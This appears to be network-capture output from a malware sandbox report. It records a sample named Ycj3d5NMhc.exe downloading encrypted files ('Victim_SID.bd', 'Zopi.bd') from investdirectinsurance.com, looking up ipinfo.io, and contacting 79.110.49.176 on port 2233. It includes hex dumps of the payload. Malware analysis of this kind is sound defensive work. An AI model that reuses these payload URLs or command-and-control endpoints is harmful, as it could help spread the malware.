Jul 27, 2024 11:37:20.685065985 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.685087919 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.685112000 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.685177088 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.685911894 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.685957909 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.685992002 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686009884 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.686032057 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686055899 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686769009 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.686813116 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.686850071 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686862946 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.686891079 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686911106 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686912060 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.686948061 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.686966896 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.686990023 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.721645117 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.721750975 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.767940044 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768075943 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768081903 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768141985 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768177986 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768193960 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768198967 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768225908 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768256903 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768279076 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768310070 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768376112 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768752098 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768791914 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768835068 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768857002 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768879890 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768906116 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768948078 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.768970013 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.768991947 CEST	443	49708	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:20.769015074 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.769015074 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:20.769052982 CEST	49708	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:21.233424902 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:21.233489037 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:21.233549118 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:21.245208979 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:21.245238066 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:21.942378998 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:21.942461967 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:21.945075989 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:21.945097923 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:21.945400953 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:21.987025023 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:22.028505087 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:22.141890049 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:22.141968012 CEST	443	49709	34.117.59.81	192.168.2.8
Jul 27, 2024 11:37:22.142066002 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:22.150693893 CEST	49709	443	192.168.2.8	34.117.59.81
Jul 27, 2024 11:37:22.637271881 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:22.642498970 CEST	2233	49710	79.110.49.176	192.168.2.8
Jul 27, 2024 11:37:22.644530058 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:22.650887966 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:22.657330036 CEST	2233	49710	79.110.49.176	192.168.2.8
Jul 27, 2024 11:37:22.658994913 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:22.665550947 CEST	2233	49710	79.110.49.176	192.168.2.8
Jul 27, 2024 11:37:24.406416893 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:24.406941891 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:24.411361933 CEST	2233	49710	79.110.49.176	192.168.2.8
Jul 27, 2024 11:37:24.412070990 CEST	2233	49710	79.110.49.176	192.168.2.8
Jul 27, 2024 11:37:24.412122965 CEST	49710	2233	192.168.2.8	79.110.49.176
Jul 27, 2024 11:37:25.065700054 CEST	49673	443	192.168.2.8	23.206.229.226
Jul 27, 2024 11:37:25.346959114 CEST	49672	443	192.168.2.8	23.206.229.226
Jul 27, 2024 11:37:26.990308046 CEST	443	49706	23.206.229.226	192.168.2.8
Jul 27, 2024 11:37:26.990521908 CEST	49706	443	192.168.2.8	23.206.229.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:37:17.914367914 CEST	56296	53	192.168.2.8	1.1.1.1
Jul 27, 2024 11:37:17.954056025 CEST	53	56296	1.1.1.1	192.168.2.8
Jul 27, 2024 11:37:21.220550060 CEST	54199	53	192.168.2.8	1.1.1.1
Jul 27, 2024 11:37:21.229491949 CEST	53	54199	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 11:37:17.914367914 CEST	192.168.2.8	1.1.1.1	0xbd00	Standard query (0)	investdirectinsurance.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:21.220550060 CEST	192.168.2.8	1.1.1.1	0x14e	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 11:37:17.954056025 CEST	1.1.1.1	192.168.2.8	0xbd00	No error (0)	investdirectinsurance.com		104.21.65.79	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:17.954056025 CEST	1.1.1.1	192.168.2.8	0xbd00	No error (0)	investdirectinsurance.com		172.67.189.102	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:21.229491949 CEST	1.1.1.1	192.168.2.8	0x14e	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:36.185839891 CEST	1.1.1.1	192.168.2.8	0xa671	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:36.185839891 CEST	1.1.1.1	192.168.2.8	0xa671	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:36.677989960 CEST	1.1.1.1	192.168.2.8	0x1bde	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:37:36.677989960 CEST	1.1.1.1	192.168.2.8	0x1bde	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:37:50.052010059 CEST	1.1.1.1	192.168.2.8	0x4c4c	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:37:50.052010059 CEST	1.1.1.1	192.168.2.8	0x4c4c	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

investdirectinsurance.com

ipinfo.io

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	104.21.65.79	443	2884	C:\Users\user\Desktop\Ycj3d5NMhc.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:37:18 UTC	136	OUT	GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
2024-07-27 09:37:19 UTC	679	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:37:19 GMT Content-Type: application/octet-stream Content-Length: 47616 Connection: close etag: "ba00-66a2ddbd-31025;;;" last-modified: Thu, 25 Jul 2024 23:20:29 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnUI4VTuVNpMZdbMtPDGgBunMPP3aFCv3n65%2BVcGh5o7%2F7THW6mXqHC5N2M7eL5UCxEI3UgKKSkknTjFcvgepFitPnDPB4f8rK6Hq3KC%2BAluzTsyCgDCl74qalbw1SM8g6JbTALsEGCLD69y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba66cecf62394-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:37:19 UTC	690	IN	Data Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 8a 4c ae 69 b1 55 7e 4c 7e d2 4c ea 39 e8 1f 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 61 0e 3e 39 4c ea 23 4c 59 ae bf 8a 8a b2 b4 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 45 4d 2a 2d 4c 6c d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac 4c 7e Data Ascii: L~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+LlLiU~L~L97L+LlfLLYa>9L#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYEM*-LlL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL6LYL~
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: e5 b0 5b c4 c2 3f 4c 2b e0 4c 6c 29 0b d8 54 68 dc 35 e0 66 24 1e fb 37 47 41 63 4c 2b 1a 4c 6c 35 e9 2a 14 c4 c2 59 57 42 71 26 72 38 10 e6 10 91 e5 a7 9c 7d b9 7c 1e 67 4c 59 7d 4c 7e 17 5a 4e 50 c4 c2 40 1a cd 5f 9c 7d e9 c6 12 df 4c 59 23 4c 7e bf 5a 4e f8 c4 c2 d0 d7 c1 41 dd 3c 70 a2 67 11 5e c8 9b 4c 7e 47 4c ea 68 ee b9 5e 63 85 c5 51 84 12 9d bf ec 49 ad 77 4c 7e ef 4c ea 02 49 ad 3d 9a 0d 71 fb 78 53 66 a2 ce c4 c2 6c 6e 1e fc a1 06 6e bc 29 67 3d 0a 53 e3 24 c6 9d bf d2 07 01 90 4c 7e 48 4c ea 56 49 ad 83 65 72 a8 31 77 3c 4c ae 62 4c 59 1e c9 8a 61 ba 2c 41 10 e6 49 d7 c1 5a 9c 7d d8 d3 06 da 4c 59 06 4c 7e ba 5a 4e dd c4 c2 d9 5d 79 12 2b 6b c6 b0 b4 59 42 35 7e df ae 8b f5 20 30 a7 e0 e5 4c 2b 9c 4c 6c 96 7c 1e a7 10 e6 21 df ae 3f 09 9c e1 Data Ascii: [?L+Ll)Th5f$7GAcL+Ll5*YWBq&r8}\|gLY}L~ZNP@_}LY#L~ZNA<pg^L~GLh^cQIwL~LI=qxSflnn)g=S$L~HLVIer1w<LbLYa,AIZ}LYL~ZN]y+kYB5~ 0L+Ll\|!?
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 41 c0 6f d9 a7 42 97 c8 92 47 88 4c 59 97 4c 7e eb 5a 4e d0 eb 1d d5 b7 22 b5 4c 6c 4f e9 2a 61 a9 5c 7f 4c 7e d3 4c ea 52 c4 c2 b7 8e e8 f1 b2 b4 67 4c ae b5 92 26 20 4c 7e 38 4c ea 22 4c 59 72 e4 f1 13 4c 6c df 4c ae 0d 10 e6 98 4c 7e 50 6b 7e e5 74 32 70 bd 88 81 67 e2 a4 59 8a 07 74 32 6b 87 d1 57 a0 07 13 99 3e cd 6b bd 84 0e 2c 5c 59 8a af 74 32 fb 78 e9 ff a0 07 43 74 32 87 cc a9 78 5a 08 96 0e ec a9 3a 4d e9 50 84 b4 04 d1 1e 11 e7 a0 85 52 62 5f bf ea 1b c8 23 0c 19 1d c9 8a ef 76 e3 79 4c 59 b7 1a cd 7d 0a 59 62 4c ae d9 4c 59 05 4c 7e 23 a6 f0 86 8c 98 7b 6f d9 26 4c 6c e3 b7 b3 37 4c 59 ad 4c 7e 41 4c ea 43 47 41 e7 4c 2b 9e 4c 6c 0b a5 60 4f 4c 59 c5 9b 5a f5 26 72 1a 74 32 6d ac 58 d2 5d bc a6 a4 61 f7 3a 4d 17 e0 66 6c 47 90 41 f3 14 50 df Data Ascii: AoBGLYL~ZN"LlO*a\L~LRgL& L~8L"LYrLlLL~Pk~t2pgYt2kW>k,\Yt2xCt2xZ:MPRb_#vyLY}YbLLYL~#{o&Ll7LYL~ALCGAL+Ll`OLYZ&rt2mX]a:MflGAP
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: b7 4c 6c 58 dc fc 66 4c 59 7c 4c 7e 5e a1 06 7e 4c 59 83 9a 0d 88 4b 18 c4 7c 1e 15 30 95 f1 9e ef ee ca 1e 21 4c 59 4d 4c 2b 94 a9 a8 b2 20 e4 14 da 7c d9 0d 3c 46 4c ea 99 4c 59 23 6f d9 4c 1a 48 9a 73 36 c9 ee b9 0d 41 96 79 eb fc 75 4c 59 94 47 d2 df b0 b6 6a 4c ae d5 4c 59 a9 2a ba 37 da cc f9 db 7d 6b a3 07 5e 2c 0c 85 dc fc 8e fd 68 d9 30 36 98 1e fb df 91 25 ef 4c 2b b2 4c 6c 49 e9 2a f8 84 82 67 63 e4 e5 4c ea 7b 4c 59 54 38 6d bf c8 d9 44 48 9b db 4c 59 07 4c 7e 20 a6 f0 85 8c 98 78 6f d9 25 4c 6c e0 b7 b3 34 4c 59 af 4c 7e 43 4c ea 40 47 41 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 c7 9b 5a f7 26 72 19 74 32 2e ec 1b d1 5d bc a5 a4 61 f4 3a 4d 14 e0 66 6e 47 90 02 b1 55 52 df f9 d2 67 e2 86 fb fb ce 78 0d e4 0e 3e 68 6b 7e be 47 41 87 85 52 b3 29 68 Data Ascii: LlXfLY\|L~^~LYK\|0!LYML+ \|<FLLY#oLHs6AyuLYGjLLY7}k^,h06%L+LlIgcL{LYT8mDHLYL~ xo%Ll4LYL~CL@GAL+Ll`LLYZ&rt2.]a:MfnGURgx>hk~GAR)h
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 6b a8 0f 9e 49 ec 75 f1 57 47 90 e3 ce da 18 6b bd 52 0e 2c 09 59 8a 9b 47 41 e7 50 84 6f 97 c0 4b 9e 49 5d 62 84 d5 c2 17 93 5e 3c 1c 78 0d 37 0e 3e ab 7b ae 7e 54 50 38 4c 2b 21 a9 a8 4c 48 9b d7 4c 59 0f 4c 7e 33 4c ea f0 c4 c2 c5 8e e8 99 a9 a8 d5 4c ae 15 00 74 93 4c 7e 4b 4c ea 90 4c 59 26 91 e5 b1 4c 6c 3f 4c ae ae 10 e6 7b 4c 7e d0 da cc 1e eb 1d 27 0a 1e 88 0d 2f 63 4c ae d8 4c 59 34 3d 4e 88 6b 7e 1e 47 41 dd 4b 5e 37 5d bc ca 9d bf 15 2f 7a ac 4c 7e 40 4c ea ea eb 1d 05 6f d9 8e 9c 7d be e0 24 4e 4c 59 70 4c 7e 8e 7b ae 63 5e c8 bf fe ca c3 4c 6c 4c 4c ae a5 eb 1d 3d 4a 48 01 eb fc 09 4c 59 7b 47 d2 37 b0 b6 d0 4c ae 39 4c 59 52 2a ba 01 36 a2 ac 54 50 e9 4c 2b 7c 51 84 1f 48 9b 91 bb cd 5e 4c 7e d6 6b 7e 49 bb cd 17 4c 2b e8 1a 48 fd 02 d7 dc Data Ascii: kIuWGkR,YGAPoKI]b^<x7>{~TP8L+!LHLYL~3LLtL~KLLY&Ll?L{L~'/cLLY4=Nk~GAK^7]/zL~@Lo}$NLYpL~{c^LlLL=JHLY{G7L9LYR*6TPL+\|QH^L~k~IL+H
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 59 9b 4c 7e 77 6d 5a 89 5e c8 26 ba ed b9 4c 6c 83 4c ae ec 49 ad 76 4d 7f b4 80 36 74 4c 59 3a 4c 2b f5 7e 9c be b8 bb 4a e1 05 0c 4c 7e 30 4c ea 3e ee b9 97 1f 3a b4 16 83 d7 4c ae 3e 4c 59 54 2a ba 49 4d eb 05 1a fe ee 4c 2b b3 4c 6c 9c 7c 1e b3 5e c8 f4 f2 b6 e4 4c ea 7a 4c 59 b5 1a cd ca 4d 6d 8a 80 54 da 4c 59 06 4c 7e ae 6d 5a f3 da 7c 37 05 91 24 4c 6c d8 4c ae 95 ee b9 3f 9e ef ed 40 b4 ad 4c 59 e5 4c 2b 78 a9 a8 37 4d af 8f ce da 72 4c 7e ea 4c ea d1 ee b9 0e 1f 3a 22 ef 8c 4e 4c ae d1 4c 59 8d 2a ba 14 4d eb e3 10 e6 43 4c 2b 2a 4c 6c 21 7c 1e 2e da 7c 1b 74 f0 bd 4c ea a7 4c 59 08 6f d9 87 9c 7d 63 d5 00 47 4c 59 5d 4c 7e 27 5a 4e 5e 4d 58 02 a9 3d 7e 4c 6c 45 4c ae 0c ee b9 d0 9e ef 43 42 b6 00 4c 59 bc 4c 2b a5 a9 a8 ec 4d af 2a c4 c2 ab 4c Data Ascii: YL~wmZ^&LlLIvM6tLY:L+~JL~0L>:L>LYTIML+Ll\|^LzLYMmTLYL~mZ\|7$LlL?@LYL+x7MrL~L:"NLLYMCL+Ll!\|.\|tLLYo}cGLY]L~'ZN^MX=~LlELCBLYL+ML
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 92 36 a2 c1 cb 6e c9 7e 49 e0 2b 6b 32 15 c0 f1 cb 6e f2 63 e4 92 6d 5a 20 54 50 76 6c db 2c 4c 6c 86 dc fc a3 25 62 42 5e 6e 0b 0e a8 a9 35 71 ed 4c 2b b0 4c 6c 3e 4c ae 0b 76 31 89 6e 1e 89 31 96 fd 49 ad 63 5d 79 63 67 e2 72 5c 3e 98 0f 1a fe 13 c6 1d 4c ea 07 4c 59 4b 4c 2b 4e c0 14 41 15 c0 43 49 ad 7d df ae dd 31 96 3e 5e c8 a6 0e 6a 9e 4c 6c 35 4c ae eb 49 ad 71 4c 7e 2f 5a 4e f7 49 ad 4c 5d 79 4c 67 e2 e9 e9 2a 8c 42 35 e2 75 f1 87 de 7a 4a 0f 1a b8 c6 13 29 4c 6c d1 4c ae 38 4c 59 cf 53 86 85 a0 07 3e c4 c2 22 91 e5 7d 51 84 00 a5 60 74 ee b9 e3 e0 66 6c a1 06 ec ee b9 fb 62 84 47 66 e3 cb c6 12 96 91 25 e6 1b db bb fc 49 02 4c 59 85 63 85 83 7e 9c f0 50 84 a2 9e 49 36 63 e4 54 6d 5a 11 10 e6 01 6f d9 47 b2 b4 e5 3a 79 b1 02 76 60 7a ea fc 6d 5a Data Ascii: 6n~I+k2ncmZ TPvl,Ll%bB^n5qL+Ll>Lv1n1Ic]ycgr\>LLYKL+NACI}1>^jLl5LIqL~/ZNIL]yLg*B5uzJ)LlL8LYS>"}Q`tflbGf%ILYc~PI6cTmZoG:yv`zmZ
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 4c 59 47 4c 2b 6a 4b 18 cd b0 b4 9f ee b9 cd a6 a2 f7 47 90 9d d3 67 04 71 d5 87 d9 c9 13 b0 b4 cf 30 95 43 74 f0 07 6d 5a 16 74 32 3f a0 04 f2 f5 b0 94 98 4b c4 c4 c2 a3 2a ba 43 17 42 94 1f 89 a2 63 85 a9 05 90 2c cb 18 e0 78 0d 14 74 f0 c7 5a 4e ec 0c 19 71 aa 3e 7e ed 8e 37 4c ae dc 1f 89 c8 82 54 fb de 7a 82 bc 29 4e 5d 79 07 a9 a8 bb b9 ba 22 ee b9 d4 63 e4 bc 17 42 e2 10 e6 ea d7 c1 32 d6 41 e8 40 94 46 e4 a1 3e 63 e4 ec 5c ba af 54 50 ea 4c 2b 38 66 e3 68 dc fc 43 a9 5c 89 d8 18 d4 6b 7e 8b 7b 0e 81 29 fd 6e 9c 7d b9 b7 b3 ee 4c 59 02 4c 7e 6e 7b ae 01 4c 59 b8 78 2e b4 b8 38 ec 4c ae 31 4c 59 7e 39 aa d1 09 9c f0 e0 04 a0 0e 6a 98 4c 6c 32 4c ae 61 d1 65 9b 16 00 4f cf 28 8c 05 02 1b 4c 2b 74 4c 6c 7a 7c 1e 74 5e c8 fb 88 cb 11 4c ea fd 4c 59 f3 Data Ascii: LYGL+jKGgq0CtmZt2?K*CBc,xtZNq>~7LTz)N]y"cB2A@F>c\TPL+8fhC\k~{)n}LYL~n{LYx.8L1LY~9jLl2LaeO(L+tLlz\|t^LLY
2024-07-27 09:37:19 UTC	1369	IN	Data Raw: 52 31 8c ec b0 c0 14 51 fd 68 7b 4c 7e e7 4c ea 1e eb 1d 17 78 2e 1f b8 38 b6 b8 bb db 4e 5b 04 4c 7e 1c 4c ea 36 ee b9 9f 0a 1e 0d 83 56 db 4c ae 36 4c 59 4c 3d 4e 01 0e a8 18 08 ef fe e4 f1 9f 4c 6c 34 4c ae 03 74 32 d3 3e 4d 05 c4 50 c3 fd 68 1d 4c 2b c3 4c 6c 0a 0b d8 e7 a9 5c 9e 39 aa 23 4b df 0a 4e 5b 41 4c 2b 28 4c 6c 22 7c 1e 2c da 7c 8c 11 c5 be 4c ea a5 4c 59 0b 6f d9 d6 0d 2f ea 1e 7c 5d 47 41 5e 4c 7e e2 4c ea 10 74 32 a2 cb dc f2 42 97 67 6d 8f ed 4c 59 01 4c 7e 6d 7b ae f4 a9 5c db 48 5d f5 fa 79 ec 4f ad 33 4c 59 a9 4c 7e 55 6d 5a 3e da 7c c9 c5 10 9a 4c 6c 31 4c ae 7b ee b9 14 0d 3c 98 28 3c f3 49 ad 18 4c 2b 76 4c 6c f7 02 d7 01 5b bc 30 91 44 32 3f cb ff 4c 59 b4 4c 2b 49 4b 18 e0 48 9b 08 bb cd 36 7b eb b9 4e e9 a0 4c 59 cc 4c 2b 61 7e Data Ascii: R1Qh{L~Lx.8N[L~L6VL6LYL=NLl4Lt2>MPhL+Ll\9#KN[AL+(Ll"\|,\|LLYo/\|]GA^L~Lt2BgmLYL~m{\H]yO3LYL~UmZ>\|Ll1L{<(<IL+vLl[0D2?LYL+IKH6{NLYL+a~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	104.21.65.79	443	2884	C:\Users\user\Desktop\Ycj3d5NMhc.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:37:19 UTC	130	OUT	GET /assuence/litesolidCha/Zopi.bd HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
2024-07-27 09:37:20 UTC	689	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:37:20 GMT Content-Type: application/octet-stream Content-Length: 549888 Connection: close etag: "86400-66a2ebab-3103e;;;" last-modified: Fri, 26 Jul 2024 00:19:55 GMT accept-ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4UV350ktCDJHgX2zA08VGIEBzuzw3BLL%2BQcou0PZfojCKlQyRfFjBO%2BrjkQzMo46SBPwOfzYey%2B30Jj4QfU3MZ2%2FkeSbGPK%2FZt3jQ7CSBFoZJ%2FTgJydExFLPpz%2FId6ljSodAT5zK8BElRB91"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba67358e10f7f-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:37:20 UTC	680	IN	Data Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 